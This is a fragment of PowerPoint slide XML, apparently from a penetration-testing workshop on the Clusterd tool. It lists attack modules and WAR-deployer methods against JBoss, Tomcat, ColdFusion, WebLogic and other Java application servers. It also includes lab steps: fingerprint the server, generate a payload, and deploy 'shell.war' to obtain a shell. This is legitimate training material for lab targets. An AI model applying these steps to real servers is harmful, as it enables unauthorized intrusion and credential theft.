            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Download the latest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github.com/hatRiot/Clusterd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty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982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73110" y="1143000"/>
            <a:ext cx="4038600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Auxiliary modules for '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Path Traversal (CVE-2005-2006) ([3.0|3.2|4.0] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>jb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-fetch)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Dump host information ([Any] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>jb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-info)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>List deployed WARs ([Any] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>jb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-list)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Obtain SMB hash ([3.0|3.2|4.0|4.2|5.0|5.1|6.0|6.1] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>jb-smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Verb Tampering (CVE-2010-0738) ([4.0] --verb-tamper)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Auxiliary modules for '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>coldfusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Administrative Hash Disclosure ([6.0|7.0|8.0|9.0|10.0] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-hash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Dump host information ([5.0|6.0|6.1|7.0|8.0|9.0|10.0|11.0] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-info)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Auxiliary modules for '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Gather WebLogic info ([10|12] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>wl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-info)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>deployed apps ([10|12] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>wl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-list)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Obtain SMB hash ([10|12] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>wl-smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400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400" dirty="0"/>
              <a:t>Auxiliary modules for 'tomcat'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Fetch credentials ([3.3] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tc-ofetch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Gather Tomcat info ([Any] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-info)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>List deployed WARs ([Any] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-list)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Obtain SMB hash ([5.0|5.5|6.0|7.0|8.0] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tc-smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Auxiliary modules for '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Dump host information ([3.0|3.3|4.0|4.1|4.2] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-info)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Password LFI ([3.3|4.0|4.1|4.2] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-pw)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Obtain SMB hash ([3.3|4.0] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rl-smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Auxiliary modules for 'axis2'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Dump host information ([All] --ax-info)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>List deployed services ([Any] --ax-list)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Axis2 1.4.1 LFI ([1.4] --ax-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>lfi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Auxiliary modules for 'glassfish'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>List deployed applications ([Any] --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>gf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-list)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--Aux-List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835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381000" y="1142999"/>
            <a:ext cx="4267200" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Deployers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> for '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>'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Web Console (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bsh_deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [3.2|4.0|4.2])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JMX Console (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>dfs_deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [3.2|4.0|4.2|5.0|5.1])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EJB Invoker Servlet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ejbinvokerservlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [3.2|4.0|4.2|5.0|5.1])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Management (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>http_management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [7.0|7.1|8.0|8.1])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JMX Console (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>jmx_deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [3.0|3.2|4.0|4.2|6.0|6.1])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JMX Invoker Servlet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>jmxinvokerservlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [3.2|4.0|4.2|5.0|5.1])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Web Console (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>webconsole_deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [3.2|4.0|4.2])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Deployers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> for '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>coldfusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>ColdFusion Manager (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>fck_editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [8.0])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>ColdFusion Manager (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>lfi_stager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [6.0|7.0|8.0])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>ColdFusion Manager (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>schedule_job</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [7.0|8.0|9.0|10.0|11.0])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>ColdFusion Manager (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>schedule_job_old</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [5.0|6.0|6.1])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200" dirty="0" err="1"/>
              <a:t>Deployers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> for '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>WebLogic Admin Console (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>web_deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [10|11|12])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>WebLogic Admin Console (https) (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>webs_deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [10|11|12])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Deployers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> for 'tomcat'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Tomcat Manager (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>manage_deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [4.0|4.1|5.0|5.5|6.0|7.0|8.0])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Tomcat Manager (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>webmanage_deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [4.0|4.1|5.0|5.5|6.0|7.0|8.0])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Deployers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> for '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Web Administrator (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>log_injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [3.3|4.0|4.1|4.2])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Web Administrator (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>schedule_task</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [3.0|3.3|4.0|4.1|4.2])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Railo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Server (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>thumbnail_inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [4.1|4.2])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Deployers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> for 'axis2'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Axis2 Server (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>service_upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [1.2|1.3|1.4|1.5|1.6])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Deployers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> for 'glassfish'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>GlassFish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Admin (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>admin_upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> [3.0|3.1|4.0])</a:t>
            </a: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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Deployer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-list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423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>
          <a:xfrm>
            <a:off x="6400386" y="1142998"/>
            <a:ext cx="2286001" cy="2286001"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6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 smtClean="0"/>
              <a:t>Brandon Edmunds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awhitehatter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Consultant with Coalfire Labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Husband, Father, Student, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shout out to @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dronesec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162" y="4267200"/>
            <a:ext cx="2562225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533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228600" y="1171576"/>
            <a:ext cx="8305800" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fingerprint the application server version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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="C:\Users\bedmunds\AppData\Local\Temp\SNAGHTML361884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82" y="2133600"/>
            <a:ext cx="8348202" cy="2895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933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229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use the TC-List module to learn more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43" y="1828800"/>
            <a:ext cx="8257143" cy="37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719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8305800" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let’s get a shell. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>generate a payload with our known details. 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07" y="2438400"/>
            <a:ext cx="8091993" cy="352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15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73446" y="1143000"/>
            <a:ext cx="8001000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finally, deploy and invoke our payload. Don’t forget to catch your shell! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>--deploy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shell.war</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --invoke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2050" name="Picture 2" descr="C:\Users\bedmunds\AppData\Local\Temp\SNAGHTML36ef9c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638550"/>
            <a:ext cx="8458124" cy="19240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099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Workshop contains 2 Target VMs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use your own hacking box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>inux (kali recommended)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need to install python `requests`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> strongly recommended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37066506"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4648200" y="1143000"/>
          <a:ext cx="4038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54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(Continue on for Lab Work Solutions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Questions? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Me: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>awhitehatter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Clusterd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Dev: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dronesec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95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4" y="2057400"/>
            <a:ext cx="2666997" cy="266699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86357" y="1258669"/>
            <a:ext cx="32474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en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Stop, Spoilers!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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30345" y="4891311"/>
            <a:ext cx="55595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en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Warning, the proceeding slides reveal solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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258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Target 1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7976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Start with a NMAP scan, identify open ports and running services. </a:t>
            </a:r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04" y="2590800"/>
            <a:ext cx="8102792" cy="208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81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Now lets see what other information we can enumerate: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43" y="2276857"/>
            <a:ext cx="8085714" cy="30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843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Clusterd</a:t>
            </a:r>
            <a:r>
